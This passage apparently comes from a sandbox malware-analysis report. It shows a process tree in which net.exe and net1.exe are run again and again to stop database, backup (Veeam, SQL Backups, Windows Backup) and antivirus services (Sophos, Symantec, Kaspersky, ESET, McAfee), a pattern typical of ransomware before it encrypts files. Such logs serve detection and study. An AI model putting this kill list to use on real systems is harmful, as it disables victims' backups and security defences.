    C:\Windows\system32\net1 stop MSSQLFDLauncher /y
    3⤵
    PID:5624
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:3644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:5676
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:4852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:5864
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:1980
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:5796
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:1328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:5836
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:4440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:5780
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:2232
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:5772
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:2180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLSERVER /y
  2⤵
  PID:5212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:6000
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:5288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:6020
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:5356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:6116
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MySQL80 /y
  2⤵
  PID:5380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:6092
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MySQL57 /y
  2⤵
  PID:5464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:2880
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ntrtscan /y
  2⤵
  PID:5540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:4256
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop OracleClientCache80 /y
  2⤵
  PID:5640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:232
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop PDVFSService /y
  2⤵
  PID:5732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:2916
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop POP3Svc /y
  2⤵
  PID:5804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop POP3Svc /y
    3⤵
    PID:4696
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer /y
  2⤵
  PID:5844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:2124
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:5912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:1952
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:5988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:2828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$TPS /y
  2⤵
  PID:6068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:5388
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3568
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:4032
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop RESvc /y
  2⤵
  PID:5224
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:2904
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop sacsvr /y
  2⤵
  PID:2388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:4736
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SamSs /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SamSs /y
    3⤵
    PID:2436
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SAVAdminService /y
  2⤵
  PID:4704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:1492
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SAVService /y
  2⤵
  PID:1040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:2268
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SDRSVC /y
  2⤵
  PID:2948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:1168
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SepMasterService /y
  2⤵
  PID:1172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:2944
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ShMonitor /y
  2⤵
  PID:2964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:5584
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop Smcinst /y
  2⤵
  PID:3516
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:3456
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SmcService /y
  2⤵
  PID:5648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:5012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SMTPSvc /y
  2⤵
  PID:5236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:2496
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SNAC /y
  2⤵
  PID:2636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SNAC /y
    3⤵
    PID:4700
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SntpService /y
  2⤵
  PID:4924
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:4780
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop sophossps /y
  2⤵
  PID:5884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:5864
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:3024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:5868
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:3176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:6000
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:5904
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:5680
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:5496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:5148
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:6036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:5188
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:2108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:3880
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:6076
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:1980
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:5436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:5428
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:2660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:5480
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:1600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:5348
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:3484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:1576
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:5316
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:3720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5180
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLBrowser /y
  2⤵
  PID:5984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:644
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:5796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:4892
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:3912
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:6064
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:5692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:5196
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:6052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:3172
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLWriter /y
  2⤵
  PID:1652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:2904
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SstpSvc /y
  2⤵
  PID:4912
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SstpSvc /y
    3⤵
    PID:5852
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop svcGenericHost /y
  2⤵
  PID:4504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:3556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_filter /y
  2⤵
  PID:4496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:2612
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_service /y
  2⤵
  PID:5232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:1168
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_update_64 /y
  2⤵
  PID:3016
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:764
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TmCCSF /y
  2⤵
  PID:5992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:3480
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop tmlisten /y
  2⤵
  PID:5404
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:5668
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKey /y
  2⤵
  PID:1444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:2680
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:2124
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:4952
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:5552
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:4464
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop UI0Detect /y
  2⤵
  PID:232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:5884
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:5656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:4780
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:5380
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:3908
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:5856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:4348
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:3396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:5784
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:4924
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:1136
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:5724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:2192
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:4704
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamMountSvc /y
  2⤵
  PID:5224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:4452
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5284
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3456
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:392
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:4144
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5632
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5168
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop W3Svc /y
  2⤵
  PID:2140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:3668
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop wbengine /y
  2⤵
  PID:5308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:2468
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop WRSVC /y
  2⤵
  PID:1328
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:5980
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2248
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5536
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:1892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2352
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:5512
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:3896
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_update /y
  2⤵
  PID:1816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:2992
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:3664
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:2660
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:4852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:5896
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQL Backups" /y
  2⤵
  PID:5204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQL Backups" /y
    3⤵
    PID:3720
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PROD /y
  2⤵
  PID:5220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:5712
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y
  2⤵
  PID:2208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
    3⤵
    PID:5436
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:1740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:4892
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:5456
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:6084
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop msftesql$PROD /y
  2⤵
  PID:5548
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:5440
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop NetMsmqActivator /y
  2⤵
  PID:4240
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetMsmqActivator /y
    3⤵
    PID:6088
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EhttpSrv /y
  2⤵
  PID:5428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:2828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ekrn /y
  2⤵
  PID:5688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:644
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ESHASRV /y
  2⤵
  PID:5852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:5800
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:3960
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:1384
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:4400
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AVP /y
  2⤵
  PID:5124
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:1432
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop klnagent /y
  2⤵
  PID:2804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:5584
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:4340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:5660
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:1732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:4464
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop wbengine /y
  2⤵
  PID:5832
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:5736
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop kavfsslp /y
  2⤵
  PID:3640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:752
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop KAVFSGT /y
  2⤵
  PID:5700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:5580
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop KAVFS /y
  2⤵
  PID:5764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:3744
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfefire /y
  2⤵
  PID:4744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
